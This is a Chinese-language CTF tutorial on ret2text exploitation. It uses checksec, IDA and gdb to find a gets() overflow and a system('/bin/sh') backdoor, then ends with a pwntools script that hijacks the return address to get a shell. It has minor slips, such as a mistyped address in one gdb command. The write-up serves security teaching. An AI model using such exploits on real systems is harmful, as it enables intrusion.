ret2text

1、查看架构和保护措施

使用checksec <文件>查看架构

几个方向：

①没有PIE，ret2libc

②没有NX保护，ret2shellcode

③其他：ret2csu，ret2syscall，ret2text

2、寻找后门函数

• 根据checksec，我们已经知道文件是32位，用32位的IDA静态分析

• 在函数窗口（Functions Windows）中按”Crtl+F“搜索”system“，看是否存在system函数

发现了system函数，且该函数存在于plt段，且拥有参数”/bin/sh“，system函数相当于shellcode

• 按”Ctrl+A“全选，然后鼠标右键点击”Copy to Assmenbly“来到汇编窗口，接着按空格进入到内存的所有汇编代码视图窗口

• 记下system后门函数的地址（因为没有开PIE保护，我们能直接利用返回地址返回到system），一般而言调用函数的第一句汇编语言是”pop ebx“，所以system函数的地址为：0x08048522

3、寻找危险函数

• 来到main函数的汇编窗口，按”F5“，进行反汇编成C语言代码，分析main的主逻辑

• 主逻辑分析：

• • setbuf函数用于关闭缓冲区，使得内存的内容直接输入或输出到I/O设备，不存在漏洞

  • vulnerable自己编写的函数，看着很可疑

• 点入vulnerable函数，发现该函数的功能为调用get函数往缓冲区buffer（即vulnerable函数栈桢的local var）写数据。由于字符数组buffer的长度为8字节，但是gets函数可以输入无限字节的字符串，这就会造成溢出！所以在vulnerable函数栈帧内发生溢出，准备计算偏移量

4、计算偏移量

• 计算偏移量有两种方式

• • 第一种是利用IDA静态分析得出的”ebp-10h“，可以知道buffer距离ebp的偏移量为10h，我们需要覆盖到返回地址（返回地址在ebp的下一个连续的存储单元，即紧邻ebp的下一位）为：0x10h+0x4

  • 第二种是利用gdb动态调试

• gdb动态调试求偏移量

①gdb <文件>

②b mian 或者start进入到程序的入口（当面对较复杂时，在我们想要的位置上打断点，具体会在ret2libc3介绍）

③使用r命令，如果有断点，停在断点处；

④在“DISASM”反汇编窗口观察程序执行逻辑，输入ni，进行单步过操作

⑤一直步过到“call vulnerable”，输入si指令，进入到函数内部(通过IDA的静态分析，我们已经知道缓冲区溢出是vulnerable函数里的buffr局部变量)

观察“BACKTRACE”函数调用栈的先后顺序窗口可知，我们已经进入到vulnerable函数内部

⑥继续按ni单步执行到gets函数，此时终端处于等待用户输入的状态

我们输入’aaaa‘刚好32位的数据，然后执行stack <数字>查看任意多行的栈空间的情况

观察’aaaa‘数据最后是存放在哪里，我们发现’aaaa‘数据最后存放在0xffffd188的位置上

⑦计算buff2到ret_addr的偏移量

buff2的地址为：0xffffd188

ret_addr的地址为：0xffffd19c（其实gdb已经告诉我们这个地址里的内容就是main函数的下一条指令：sub esp,0xc 的地址）

使用gdb自带的计算距离的指令：distance <地址1> <地址2>

distance 0xffffd188 0xffffd193

计算得出偏移量为：0x14 bytes

5、编写exp

from pwn import * #引入pwntools模块

io = process('./ret2text')#建立io

#io = remote('网址或IP地址',端口)

io.recv()#接受服务端的数据

system_addr = 0x08048522#system的地址

payload = flat([b'A'*0x14,system_addr])#推荐使用

#构造payload，其中flat是将列表封装起来，变成bit流数据。

#填充b'A'*0x14个垃圾数据，ret_addr的位置填入system_addr到达劫持程序的执行流的目的

#payload = b'A'*0x14+p32(system_add)

io.sendline(payload)#各户端发送数据

io.interactive()#进行交互模式